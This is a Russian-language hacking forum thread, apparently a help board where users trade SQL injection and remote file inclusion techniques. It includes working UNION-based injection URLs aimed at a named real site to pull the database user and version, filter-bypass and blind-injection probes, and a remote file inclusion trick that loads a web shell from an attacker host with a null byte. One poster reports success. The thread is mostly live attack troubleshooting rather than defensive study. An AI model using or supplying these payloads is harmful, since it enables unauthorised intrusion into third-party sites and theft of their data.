Code: $a = $_GET["req"]; SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е. Code: SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2 и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же Code: SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2 в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ.
помогите раскуртить http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
собственно в чем проблема? Code: http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
Ну тут два варианта, либо это RFI, либо просто фрейм. В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел. Так что дай больше информации
РОсширение .php. НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат? Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь. UPD: Залил) помогло добавления нулл байта после .txt) СПасибо за помощь! Лови +
подскажите как обойти фильтрацию минуса делаю поля версии не видно делаю перенаправляет на главную страницу
noviyuser зафелси запрос более мягко, and+1!=1 and+1>2 and+verson()=user() и тп. если видны ошибки мускула, попробуй эррор бейсд.
ну по всей же видимости Code: id=1+and+1=0+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+ да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version() ни один из способов не помог вроде не слепая пробовал and+substring(@@version,1,1)=4 and+substring(@@version,1,1)=5 пробовал и так и так id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+ id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+ если ставлю кавычку или минус перенаправляет
order+by+19 на таком перенаправляет order+by+20 id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,20 тоже перенаправляет null тоже не помогает
Глупый вопрос: если я делаю запрос Code: www.xxx.ru/auth.php?id=1' ничего не происходит, открывает ту же самою страницу, То есть ' фильтруется? /// Мдаа...
